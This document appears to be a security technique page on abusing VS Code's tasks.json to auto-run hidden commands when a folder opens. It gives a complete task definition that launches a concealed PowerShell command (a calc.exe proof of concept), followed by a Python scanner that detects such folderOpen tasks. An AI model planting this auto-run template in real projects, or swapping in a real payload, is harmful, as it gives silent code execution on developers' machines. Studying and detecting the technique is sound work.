VSCode allows automatic task execution via the `tasks.json` file. By abusing this, an attacker can introduce a stealthy backdoor that executes arbitrary code when the folder is opened in VSCode.

- Create a `.vscode/` directory in the root of the project (if it doesn't already exist).
- Add a `tasks.json` file with the following content.

This example runs a hidden PowerShell command to start `calc.exe` when the folder is opened in VSCode.
```json
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "VS",
      "type": "shell",
      "command": "powershell",
      "args": [
        "-WindowStyle", "Hidden",
        "-Command",
        "Start-Process calc.exe"
      ],
      "problemMatcher": [],
      "group": {
        "kind": "build",
        "isDefault": true
      },
      "runOptions": {
        "runOn": "folderOpen"
      },
      "presentation": {
        "echo": false,
        "reveal": "never",
        "focus": false,
        "panel": "dedicated"
      }
    }
  ]
}
```
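
To check a cloned repository for this pattern before opening it, the following added example (not part of the original page) parses `.vscode/tasks.json` files and reports every task with `runOn` set to `folderOpen`, noting whether its output is hidden. The function names and the `SAMPLE` input are constructed for illustration.

```python
import json
import re
from pathlib import Path

# tasks.json is JSONC: keep string literals, drop // and /* */ comments.
_JSONC = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/', re.S)

def parse_jsonc(text):
    """Best-effort JSONC parse: strip comments, then trailing commas."""
    text = _JSONC.sub(lambda m: m.group(0) if m.group(0)[0] == '"' else "", text)
    return json.loads(re.sub(r",(\s*[}\]])", r"\1", text))

def audit_tasks(text):
    """Return one finding per task that runs automatically on folder open."""
    doc = parse_jsonc(text)
    if not isinstance(doc, dict):
        return []
    findings = []
    for task in doc.get("tasks", []):
        if not isinstance(task, dict):
            continue
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        pres = task.get("presentation", {})
        # Hidden = terminal panel never revealed, or the command line not echoed.
        hidden = pres.get("reveal") in ("never", "silent") or pres.get("echo") is False
        parts = [task.get("command", "")] + list(task.get("args", []))
        findings.append({"label": task.get("label"),
                         "command": " ".join(str(p) for p in parts),
                         "hidden": hidden})
    return findings

def scan_tree(root):
    """Map each .vscode/tasks.json under root to its findings (or a parse error)."""
    results = {}
    for path in Path(root).rglob("tasks.json"):
        if path.parent.name != ".vscode":
            continue
        try:
            results[str(path)] = audit_tasks(path.read_text(encoding="utf-8", errors="replace"))
        except (OSError, ValueError, AttributeError) as exc:
            results[str(path)] = [{"error": str(exc)}]
    return results

# Constructed sample: the task shown above plus a benign task, with JSONC quirks.
SAMPLE = """{ // constructed sample
  "version": "2.0.0",
  "tasks": [
    {"label": "VS", "type": "shell", "command": "powershell",
     "args": ["-WindowStyle", "Hidden", "-Command", "Start-Process calc.exe"],
     "runOptions": {"runOn": "folderOpen"},
     "presentation": {"echo": false, "reveal": "never"}},
    {"label": "build", "type": "shell", "command": "make",},
  ]
}"""

if __name__ == "__main__":
    for finding in audit_tasks(SAMPLE):
        print(finding)
```

VS Code does not run tasks while a folder is open in Restricted Mode, so run the scan before trusting a freshly cloned workspace.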